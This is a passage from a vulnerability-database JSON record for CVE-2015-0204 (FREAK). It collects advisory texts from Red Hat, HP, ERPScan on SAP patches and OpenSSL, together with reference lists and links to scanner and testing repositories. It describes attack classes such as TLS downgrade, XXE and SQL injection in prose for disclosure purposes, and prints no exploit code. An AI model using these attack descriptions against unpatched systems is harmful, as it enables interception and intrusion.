rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-8275\nhttps://access.redhat.com/security/cve/CVE-2015-0204\nhttps://access.redhat.com/security/cve/CVE-2015-0287\nhttps://access.redhat.com/security/cve/CVE-2015-0288\nhttps://access.redhat.com/security/cve/CVE-2015-0289\nhttps://access.redhat.com/security/cve/CVE-2015-0292\nhttps://access.redhat.com/security/cve/CVE-2015-0293\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://www.openssl.org/news/secadv_20150108.txt \nhttps://www.openssl.org/news/secadv_20150319.txt\nhttps://access.redhat.com/articles/1384453\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFVK6+gXlSAg2UNWIIRAoSlAJ0UGwyEUVUDOKBoGDKJRsDtDdmxSwCgvH9a\nM4Bxjq//ZXaJCcyFFc1l5A4=\n=rctB\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce. \nHP SSL for OpenVMS: All versions prior to 1.4-502. \n\n  HP SSL 1.4-502 for OpenVMS (based on OpenSSL 0.9.8ze) is available from the\nfollowing locations:\n\n    - HP SSL for OpenVMS website:\n\n      http://h71000.www7.hp.com/openvms/products/ssl/ssl.html\n\n    - HP Support Center website:\n\n      https://h20566.www2.hp.com/portal/site/hpsc/patch/home\n\n      Note: Login using your HP Passport account. SAP \u003chttp://www.sap.com/\u003ehas released the monthly critical patch update \nfor June 2015. This patch update closes a lot of vulnerabilities in SAP \nproducts. The most popular vulnerability is Missing Authorization Check. \nThis month, three critical vulnerabilities found by ERPScan researchers \nVahagn Vardanyan, Rustem Gazizov, and Diana Grigorieva were closed. \n\n*Issues that were patched with the help of ERPScan*\n\nBelow are the details of SAP vulnerabilities that were found byERPScan \n\u003chttp://www.erpscan.com/\u003eresearchers. \n\n  * An XML eXternal Entity vulnerability in SAP Mobile Platform\n    on-premise (CVSS Base Score:5.5).Updateis available in SAP Security\n    Note2159601 \u003chttps://service.sap.com/sap/support/notes/2159601\u003e. An\n    attacker can use XML eXternal Entities to send specially crafted\n    unauthorized XML requests, which will be processed by the XML\n    parser. The attacker will get unauthorized access to the OS file system. \n  * A Hardcoded Credentials vulnerability in SAP Cross-System Tools\n    (CVSS Base Score:3.6).Updateis available in SAP Security Note2059659\n    \u003chttps://service.sap.com/sap/support/notes/2059659\u003e. In addition, it is likely that the\n    code will be implemented as a backdoor into the system. \n  * A Hardcoded Credentials vulnerability in SAP Data Transfer Workbench\n    (CVSS Base Score:2.1).Updateis available in SAP Security Note2057982\n    \u003chttps://service.sap.com/sap/support/notes/2057982\u003e. In addition, it is likely that the\n    code will be implemented as a backdoor into the system. \n\n\n*The most critical issues found by other researchers*\n\nSome of our readers and clients asked us to categorize the most critical \nSAP vulnerabilities to patch them first. Companies providing SAP \nSecurity Audit, SAP Security Assessment, or SAP Penetration Testing \nservices can include these vulnerabilities in their checklists. The most \ncritical vulnerabilities of this update can be patched by the following \nSAP Security Notes:\n\n  * 2151237 \u003chttps://service.sap.com/sap/support/notes/2151237\u003e: SAP GUI\n    for Windows has a Buffer Overflow vulnerability (CVSS Base\n    Score:9.3). An attacker can use Buffer Overflow for injecting\n    specially crafted code into working memory, which will be executed\n    by the vulnerable application under the privileges of that\n    application. In case of command execution,attackercan obtain\n    critical technical and business-related information stored in the\n    vulnerable SAP-system or escalate their own privileges. For this time, nobody will be able to use this service,\n    which negatively influences business processes, system downtime,\n    and, consequently, business reputation. It is recommended to install\n    this SAP Security Note to prevent risks. \n  * 2129609 \u003chttps://service.sap.com/sap/support/notes/2129609\u003e: SAP EP\n    JDBC Connector has an SQL Injection vulnerability (CVSS Base\n    Score:6.5). An attacker can use SQL Injections with the help of\n    specially crafted SQL queries. They can read and modify sensitive\n    information from a database, execute administrative operations in a\n    database, destroy data or make it unavailable. In some cases, an\n    attacker can access system data or execute OS commands. It is\n    recommended to install this SAP Security Note to prevent risks. \n  * 1997734 \u003chttps://service.sap.com/sap/support/notes/1997734\u003e: SAP RFC\n    runtime has a Missing AuthorizationXheckvulnerability (CVSS Base\n    Score:6.0). An attacker can use Missing Authorization Checks to\n    access a service without any authorization procedures and use\n    service functionality that has restricted access. It\n    is recommended to install this SAP Security Note to prevent risks. \n  * 2163306 \u003chttps://service.sap.com/sap/support/notes/2163306\u003e: SAP\n    CommonCryptoLib and SAPCRYPTOLIB are vulnerable to FREAK\n    (CVE-2015-0204, CVSS Base Score:5.0). It allows an attacker to\n    intercept HTTPS connections between vulnerable clients and servers\n    and force them to use weakened encryption, which the attacker can\n    break to steal or manipulate sensitive data. All the attacks on this\n    page assume a network adversary (i.e. a man-in-the-middle) to tamper\n    with TLS handshake messages. The typical scenario to mount such\n    attacks is by tampering with the Domain Name System (DNS), for\n    example via DNS rebinding or domain name seizure. This attack\n    targets a class of deliberately weak export cipher suites. It is\n    recommended to install this SAP Security Note to prevent risks. \n\n\n*References about the FREAK vulnerability:*\n\n  * SMACK: State Machine AttaCKs \u003chttps://www.smacktls.com/\u003e\n  * Tracking the FREAK Attack \u003chttps://freakattack.com/\u003e\n  * CVE-2015-0204\n    \u003chttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204\u003e\n\n\nIt is highly recommended to patch all those SAP vulnerabilities to \nprevent business risks affecting your SAP systems. \n\nSAP has traditionally thanked the security researchers from ERPScan for \nfound vulnerabilities on theiracknowledgment page \n\u003chttp://scn.sap.com/docs/DOC-8218\u003e. \n\nAdvisories for those SAP vulnerabilities with technical details will be \navailable in 3 months onerpscan.com \u003chttp://www.erpscan.com/\u003e. \n\n-- \n\nDarya Maenkova\n\nPR manager\n\n\u003chttps://www.linkedin.com/company/2217474?trk=ppro_cprof\u003e \n\u003chttps://twitter.com/erpscan\u003e\n\n\u003chttp://erpscan.com/\u003e\n\n------------------------------------------------------------------------\n\ne-mail: d.maenkova@erpscan.com \u003cmailto:d.maenkova@erpscan.com\u003e\n\naddress: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\n\nphone: 650.798.5255\n\nerpscan.com \u003chttp://erpscan.com\u003e\n\n. OpenSSL Security Advisory [08 Jan 2015]\n=======================================\n\nDTLS segmentation fault in dtls1_get_record (CVE-2014-3571)\n===========================================================\n\nSeverity: Moderate\n\nA carefully crafted DTLS message can cause a segmentation fault in OpenSSL due\nto a NULL pointer dereference. \n\nThis issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8. \n\nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1k. \nOpenSSL 1.0.0 DTLS users should upgrade to 1.0.0p. \nOpenSSL 0.9.8 DTLS users should upgrade to 0.9.8zd. \n\nThis issue was reported to OpenSSL on 22nd October 2014 by Markus Stenberg of\nCisco Systems, Inc. The fix was developed by Stephen Henson of the OpenSSL\ncore team. \n\nDTLS memory leak in dtls1_buffer_record (CVE-2015-0206)\n=======================================================\n\nSeverity: Moderate\n\nA memory leak can occur in the dtls1_buffer_record function under certain\nconditions. In particular this could occur if an attacker sent repeated DTLS\nrecords with the same sequence number but for the next epoch. The memory leak\ncould be exploited by an attacker in a Denial of Service attack through memory\nexhaustion. \n\nThis issue affects OpenSSL versions: 1.0.1 and 1.0.0. \n\nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1k. \nOpenSSL 1.0.0 DTLS users should upgrade to 1.0.0p. \n\nThis issue was reported to OpenSSL on 7th January 2015 by Chris Mueller who also\nprovided an initial patch. Further analysis was performed by Matt Caswell of the\nOpenSSL development team, who also developed the final patch. \n\nno-ssl3 configuration sets method to NULL (CVE-2014-3569)\n=========================================================\n\nSeverity: Low\n\nWhen openssl is built with the no-ssl3 option and a SSL v3 ClientHello is\nreceived the ssl method would be set to NULL which could later result in\na NULL pointer dereference. \n\nThis issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8. \n\nOpenSSL 1.0.1 users should upgrade to 1.0.1k. \nOpenSSL 1.0.0 users should upgrade to 1.0.0p. \nOpenSSL 0.9.8 users should upgrade to 0.9.8zd. \n\nThis issue was reported to OpenSSL on 17th October 2014 by Frank Schmirler. The\nfix was developed by Kurt Roeckx. \n\n\nECDHE silently downgrades to ECDH [Client] (CVE-2014-3572)\n==========================================================\n\nSeverity: Low\n\nAn OpenSSL client will accept a handshake using an ephemeral ECDH ciphersuite\nusing an ECDSA certificate if the server key exchange message is omitted. This\neffectively removes forward secrecy from the ciphersuite. \n\nThis issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8. \n\nOpenSSL 1.0.1 users should upgrade to 1.0.1k. \nOpenSSL 1.0.0 users should upgrade to 1.0.0p. \nOpenSSL 0.9.8 users should upgrade to 0.9.8zd. \n\nThis issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan\nBhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen\nHenson of the OpenSSL core team. \n\n\nRSA silently downgrades to EXPORT_RSA [Client] (CVE-2015-0204)\n==============================================================\n\nSeverity: Low\n\nAn OpenSSL client will accept the use of an RSA temporary key in a non-export\nRSA key exchange ciphersuite. A server could present a weak temporary key\nand downgrade the security of the session. \n\nThis issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8. \n\nOpenSSL 1.0.1 users should upgrade to 1.0.1k. \nOpenSSL 1.0.0 users should upgrade to 1.0.0p. \nOpenSSL 0.9.8 users should upgrade to 0.9.8zd. \n\nThis issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan\nBhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen\nHenson of the OpenSSL core team. \n\n\nDH client certificates accepted without verification [Server] (CVE-2015-0205)\n=============================================================================\n\nSeverity: Low\n\nAn OpenSSL server will accept a DH certificate for client authentication\nwithout the certificate verify message. This effectively allows a client\nto authenticate without the use of a private key. This only affects servers\nwhich trust a client certificate authority which issues certificates\ncontaining DH keys: these are extremely rare and hardly ever encountered. \n\nThis issue affects OpenSSL versions: 1.0.1 and 1.0.0. \n\nOpenSSL 1.0.1 users should upgrade to 1.0.1k. \nOpenSSL 1.0.0 users should upgrade to 1.0.0p. \n\nThis issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan\nBhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen\nHenson of the OpenSSL core team. \n\n\nCertificate fingerprints can be modified (CVE-2014-8275)\n========================================================\n\nSeverity: Low\n\nOpenSSL accepts several non-DER-variations of certificate signature\nalgorithm and signature encodings. OpenSSL also does not enforce a\nmatch between the signature algorithm between the signed and unsigned\nportions of the certificate. By modifying the contents of the\nsignature algorithm or the encoding of the signature, it is possible\nto change the certificate\u0027s fingerprint. \n\nThis does not allow an attacker to forge certificates, and does not\naffect certificate verification or OpenSSL servers/clients in any\nother way. It also does not affect common revocation mechanisms. Only\ncustom applications that rely on the uniqueness of the fingerprint\n(e.g. certificate blacklists) may be affected. \n\nThis issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and\n0.9.8. \n\nOpenSSL 1.0.1 users should upgrade to 1.0.1k. \nOpenSSL 1.0.0 users should upgrade to 1.0.0p. \nOpenSSL 0.9.8 users should upgrade to 0.9.8zd. \n\nOne variant of this issue was discovered by Antti Karjalainen and\nTuomo Untinen from the Codenomicon CROSS program and reported to\nOpenSSL on 1st December 2014 by NCSC-FI Vulnerability\nCo-ordination. Another variant was independently reported to OpenSSL\non 12th December 2014 by Konrad Kraszewski from Google. Further\nanalysis was conducted and fixes were developed by Stephen Henson of\nthe OpenSSL core team. \n\nBignum squaring may produce incorrect results (CVE-2014-3570)\n=============================================================\n\nSeverity: Low\n\nBignum squaring (BN_sqr) may produce incorrect results on some\nplatforms, including x86_64. This bug occurs at random with a very\nlow probability, and is not known to be exploitable in any way, though\nits exact impact is difficult to determine. The following has been\ndetermined:\n\n*) The probability of BN_sqr producing an incorrect result at random\nis very low: 1/2^64 on the single affected 32-bit platform (MIPS) and\n1/2^128 on affected 64-bit platforms. \n*) On most platforms, RSA follows a different code path and RSA\noperations are not affected at all. For the remaining platforms\n(e.g. OpenSSL built without assembly support), pre-existing\ncountermeasures thwart bug attacks [1]. \n*) Static ECDH is theoretically affected: it is possible to construct\nelliptic curve points that would falsely appear to be on the given\ncurve. However, there is no known computationally feasible way to\nconstruct such points with low order, and so the security of static\nECDH private keys is believed to be unaffected. \n*) Other routines known to be theoretically affected are modular\nexponentiation, primality testing, DSA, RSA blinding, JPAKE and\nSRP. No exploits are known and straightforward bug attacks fail -\neither the attacker cannot control when the bug triggers, or no\nprivate key material is involved. \n\nThis issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8. \n\nOpenSSL 1.0.1 users should upgrade to 1.0.1k. \nOpenSSL 1.0.0 users should upgrade to 1.0.0p. \nOpenSSL 0.9.8 users should upgrade to 0.9.8zd. \n\nThis issue was reported to OpenSSL on 2nd November 2014 by Pieter Wuille\n(Blockstream) who also suggested an initial fix. Further analysis was\nconducted by the OpenSSL development team and Adam Langley of\nGoogle. The final fix was developed by Andy Polyakov of the OpenSSL\ncore team. \n\n[1] http://css.csail.mit.edu/6.858/2013/readings/rsa-bug-attacks.pdf\n\nNote\n====\n\nAs per our previous announcements and our Release Strategy\n(https://www.openssl.org/about/releasestrat.html), support for OpenSSL versions\n1.0.0 and 0.9.8 will cease on 31st December 2015. No security updates for these\nreleases will be provided after that date. Users of these releases are advised\nto upgrade. \n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv_20150108.txt\n\nNote: the online version of the advisory may be updated with additional\ndetails over time. \n\nFor details of OpenSSL severity classifications please see:\nhttps://www.openssl.org/about/secpolicy.html\n\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2015-0204"
          },
          {
            "db": "CERT/CC",
            "id": "VU#243585"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-001672"
          },
          {
            "db": "BID",
            "id": "71936"
          },
          {
            "db": "VULMON",
            "id": "CVE-2015-0204"
          },
          {
            "db": "PACKETSTORM",
            "id": "138473"
          },
          {
            "db": "PACKETSTORM",
            "id": "131940"
          },
          {
            "db": "PACKETSTORM",
            "id": "133316"
          },
          {
            "db": "PACKETSTORM",
            "id": "130987"
          },
          {
            "db": "PACKETSTORM",
            "id": "131387"
          },
          {
            "db": "PACKETSTORM",
            "id": "131408"
          },
          {
            "db": "PACKETSTORM",
            "id": "132268"
          },
          {
            "db": "PACKETSTORM",
            "id": "132763"
          },
          {
            "db": "PACKETSTORM",
            "id": "129867"
          }
        ],
        "trust": 3.51
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2015-0204",
            "trust": 2.3
          },
          {
            "db": "CERT/CC",
            "id": "VU#243585",
            "trust": 1.6
          },
          {
            "db": "BID",
            "id": "71936",
            "trust": 1.4
          },
          {
            "db": "JUNIPER",
            "id": "JSA10679",
            "trust": 1.4
          },
          {
            "db": "BID",
            "id": "91787",
            "trust": 1.1
          },
          {
            "db": "MCAFEE",
            "id": "SB10102",
            "trust": 1.1
          },
          {
            "db": "MCAFEE",
            "id": "SB10108",
            "trust": 1.1
          },
          {
            "db": "MCAFEE",
            "id": "SB10110",
            "trust": 1.1
          },
          {
            "db": "SECTRACK",
            "id": "1033378",
            "trust": 1.1
          },
          {
            "db": "JVN",
            "id": "JVNVU99125992",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-001672",
            "trust": 0.8
          },
          {
            "db": "VULMON",
            "id": "CVE-2015-0204",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "138473",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "131940",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "133316",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "130987",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "131387",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "131408",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "132268",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "132763",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "129867",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#243585"
          },
          {
            "db": "VULMON",
            "id": "CVE-2015-0204"
          },
          {
            "db": "BID",
            "id": "71936"
          },
          {
            "db": "PACKETSTORM",
            "id": "138473"
          },
          {
            "db": "PACKETSTORM",
            "id": "131940"
          },
          {
            "db": "PACKETSTORM",
            "id": "133316"
          },
          {
            "db": "PACKETSTORM",
            "id": "130987"
          },
          {
            "db": "PACKETSTORM",
            "id": "131387"
          },
          {
            "db": "PACKETSTORM",
            "id": "131408"
          },
          {
            "db": "PACKETSTORM",
            "id": "132268"
          },
          {
            "db": "PACKETSTORM",
            "id": "132763"
          },
          {
            "db": "PACKETSTORM",
            "id": "129867"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-001672"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-0204"
          }
        ]
      },
      "id": "VAR-201501-0338",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.48673216
      },
      "last_update_date": "2026-03-09T22:30:39.973000Z",
      "patch": {
        "_id": null,
        "data": [
          {
            "title": "\u30a2\u30e9\u30a4\u30c9\u30c6\u30ec\u30b7\u30b9\u682a\u5f0f\u4f1a\u793e\u304b\u3089\u306e\u60c5\u5831",
            "trust": 0.8,
            "url": "http://jvn.jp/vu/JVNVU99125992/522154/index.html"
          },
          {
            "title": "NV15-016",
            "trust": 0.8,
            "url": "http://jpn.nec.com/security-info/secinfo/nv15-016.html"
          },
          {
            "title": "[08 Jan 2015]",
            "trust": 0.8,
            "url": "https://www.openssl.org/news/secadv_20150108.txt"
          },
          {
            "title": "3046015",
            "trust": 0.8,
            "url": "https://technet.microsoft.com/ja-jp/library/security/3046015"
          },
          {
            "title": "Red Hat: Moderate: openssl security update",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20150066 - Security Advisory"
          },
          {
            "title": "Cisco: OpenSSL RSA Temporary Key Cryptographic Downgrade Vulnerability",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=Cisco-SA-20150113-CVE-2015-0204"
          },
          {
            "title": "Red Hat: CVE-2015-0204",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2015-0204"
          },
          {
            "title": "Symantec Security Advisories: SA91 : FREAK Attack",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=fb8c9ab0a61ac1def90eef5ef6757895"
          },
          {
            "title": "Ubuntu Security Notice: openssl vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-2459-1"
          },
          {
            "title": "Debian Security Advisories: DSA-3125-1 openssl -- security update",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=a3210fee56d96657bbff4ad44c3d0807"
          },
          {
            "title": "Amazon Linux AMI: ALAS-2015-469",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2015-469"
          },
          {
            "title": "Splunk Security Announcements: Splunk Enterprise versions 6.1.7, 6.0.8, and 5.0.12 address two vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=splunk_security_announcements\u0026qid=e17c368f43499efc420edc223af663db"
          },
          {
            "title": "Symantec Security Advisories: SA88 : OpenSSL Security Advisory 08-Jan-2015",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=9281dc3b1a760e1cf2711cdf82cf64d7"
          },
          {
            "title": "Cisco: Multiple Vulnerabilities in OpenSSL (January 2015) Affecting Cisco Products",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20150310-ssl"
          },
          {
            "title": "Apple: OS X Yosemite v10.10.3 and Security Update 2015-004",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=aa5ab46566482c02434bb8cf65c9614e"
          },
          {
            "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2015",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=2a43c5799a7dd07d6c0a92a3b040d12f"
          },
          {
            "title": "Tenable Security Advisories: [R6] OpenSSL \u002720150319\u0027 Advisory Affects Tenable Products",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=TNS-2015-04"
          },
          {
            "title": "Splunk Security Announcements: Splunk Enterprise 6.2.2 addresses two vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=splunk_security_announcements\u0026qid=d9c34d2680d213e5c9dae973a42328f1"
          },
          {
            "title": "Oracle: Oracle Critical Patch Update Advisory - April 2015",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4b527561ba1a5de7a529c8a93679f585"
          },
          {
            "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - January 2015",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=eaf98750f1130c39e83765575c69e165"
          },
          {
            "title": "Oracle: Oracle Critical Patch Update Advisory - October 2015",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=744c19dc9f4f70ad58059bf8733ec9c1"
          },
          {
            "title": "Splunk Security Announcements: Splunk response to January 2015 OpenSSL vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=splunk_security_announcements\u0026qid=21b119528a2fb8c78850a17027b71424"
          },
          {
            "title": "Citrix Security Bulletins: Multiple Security Vulnerabilities in Citrix NetScaler Platform IPMI Lights Out Management (LOM) firmware",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=eb059834b7f24e2562bcf592b6d0afbc"
          },
          {
            "title": "Oracle: Oracle Critical Patch Update Advisory - July 2018",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=5f8c525f1408011628af1792207b2099"
          },
          {
            "title": "Oracle: Oracle Critical Patch Update Advisory - April 2017",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=143b3fb255063c81571469eaa3cf0a87"
          },
          {
            "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a"
          },
          {
            "title": "Oracle: Oracle Critical Patch Update Advisory - July 2015",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=459961024c4bdce7bb3a1a40a65a6f2e"
          },
          {
            "title": "Oracle: Oracle Critical Patch Update Advisory - July 2016",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=3a04485ebb79f7fbc2472bf9af5ce489"
          },
          {
            "title": "Oracle: Oracle Critical Patch Update Advisory - January 2016",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=63802a6c83b107c4e6e0c7f9241a66a8"
          },
          {
            "title": "FreakVulnChecker",
            "trust": 0.1,
            "url": "https://github.com/felmoltor/FreakVulnChecker "
          },
          {
            "title": "Freak-Scanner",
            "trust": 0.1,
            "url": "https://github.com/scottjpack/Freak-Scanner "
          },
          {
            "title": "FREAK-Attack-CVE-2015-0204-Testing-Script",
            "trust": 0.1,
            "url": "https://github.com/AbhishekGhosh/FREAK-Attack-CVE-2015-0204-Testing-Script "
          },
          {
            "title": "stuff",
            "trust": 0.1,
            "url": "https://github.com/thekondrashov/stuff "
          },
          {
            "title": "non-controlflow-hijacking-datasets",
            "trust": 0.1,
            "url": "https://github.com/camel-clarkson/non-controlflow-hijacking-datasets "
          },
          {
            "title": "scz_doc_copy",
            "trust": 0.1,
            "url": "https://github.com/TopCaver/scz_doc_copy "
          },
          {
            "title": "checks",
            "trust": 0.1,
            "url": "https://github.com/cryptflow/checks "
          },
          {
            "title": "tls",
            "trust": 0.1,
            "url": "https://github.com/greyleonie/tls "
          },
          {
            "title": "JPN_RIC13351-2",
            "trust": 0.1,
            "url": "https://github.com/neominds/JPN_RIC13351-2 "
          },
          {
            "title": "script_a2sv",
            "trust": 0.1,
            "url": "https://github.com/F4RM0X/script_a2sv "
          },
          {
            "title": "a2sv",
            "trust": 0.1,
            "url": "https://github.com/hahwul/a2sv "
          },
          {
            "title": "a2sv",
            "trust": 0.1,
            "url": "https://github.com/84KaliPleXon3/a2sv "
          },
          {
            "title": "a2sv",
            "trust": 0.1,
            "url": "https://github.com/TheRipperJhon/a2sv "
          },
          {
            "title": "sslscanner",
            "trust": 0.1,
            "url": "https://github.com/fireorb/sslscanner "
          },
          {
            "title": "a2sv",
            "trust": 0.1,
            "url": "https://github.com/H4CK3RT3CH/a2sv "
          },
          {
            "title": "HTTPSScan",
            "trust": 0.1,
            "url": "https://github.com/alexoslabs/HTTPSScan "
          },
          {
            "title": "A2SV--SSL-VUL-Scan",
            "trust": 0.1,
            "url": "https://github.com/nyctophile6/A2SV--SSL-VUL-Scan "
          },
          {
            "title": "The Register",
            "trust": 0.1,
            "url": "https://www.theregister.co.uk/2015/07/06/awoogah_get_ready_to_patch_severe_bug_in_openssl_this_thursday/"
          },
          {
            "title": "The Register",
            "trust": 0.1,
            "url": "https://www.theregister.co.uk/2015/03/13/cisco_freaks_out_starts_epic_openssl_bugsplat/"
          },
          {
            "title": "The Register",
            "trust": 0.1,
            "url": "https://www.theregister.co.uk/2015/03/03/government_crippleware_freaks_out_tlsssl/"
          },
          {
            "title": "The Register",
            "trust": 0.1,
            "url": "https://www.theregister.co.uk/2015/01/09/dead_openssl_bugs_more_fleas_than_poodles/"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2015-0204"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-001672"
          }
        ]
      },
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "CWE-310",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-Other",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-001672"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-0204"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 1.6,
            "url": "https://www.smacktls.com/#freak"
          },
          {
            "trust": 1.6,
            "url": "https://www.openssl.org/news/secadv_20150108.txt"
          },
          {
            "trust": 1.4,
            "url": "https://github.com/openssl/openssl/commit/ce325c60c74b0fa784f5872404b722e120e5cab0"
          },
          {
            "trust": 1.4,
            "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20150310-ssl"
          },
          {
            "trust": 1.4,
            "url": "http://rhn.redhat.com/errata/rhsa-2015-0066.html"
          },
          {
            "trust": 1.4,
            "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html"
          },
          {
            "trust": 1.4,
            "url": "http://rhn.redhat.com/errata/rhsa-2015-0849.html"
          },
          {
            "trust": 1.4,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883640"
          },
          {
            "trust": 1.4,
            "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html"
          },
          {
            "trust": 1.4,
            "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html"
          },
          {
            "trust": 1.4,
            "url": "https://support.citrix.com/article/ctx216642"
          },
          {
            "trust": 1.2,
            "url": "https://www.openssl.org/news/secadv_20150319.txt"
          },
          {
            "trust": 1.2,
            "url": "http://rhn.redhat.com/errata/rhsa-2015-0800.html"
          },
          {
            "trust": 1.2,
            "url": "http://rhn.redhat.com/errata/rhsa-2016-1650.html"
          },
          {
            "trust": 1.2,
            "url": "http://www.securityfocus.com/bid/71936"
          },
          {
            "trust": 1.1,
            "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:019"
          },
          {
            "trust": 1.1,
            "url": "http://support.novell.com/security/cve/cve-2015-0204.html"
          },
          {
            "trust": 1.1,
            "url": "https://freakattack.com/"
          },
          {
            "trust": 1.1,
            "url": "http://www.debian.org/security/2015/dsa-3125"
          },
          {
            "trust": 1.1,
            "url": "http://marc.info/?l=bugtraq\u0026m=142496289803847\u0026w=2"
          },
          {
            "trust": 1.1,
            "url": "http://lists.opensuse.org/opensuse-security-announce/2015-01/msg00021.html"
          },
          {
            "trust": 1.1,
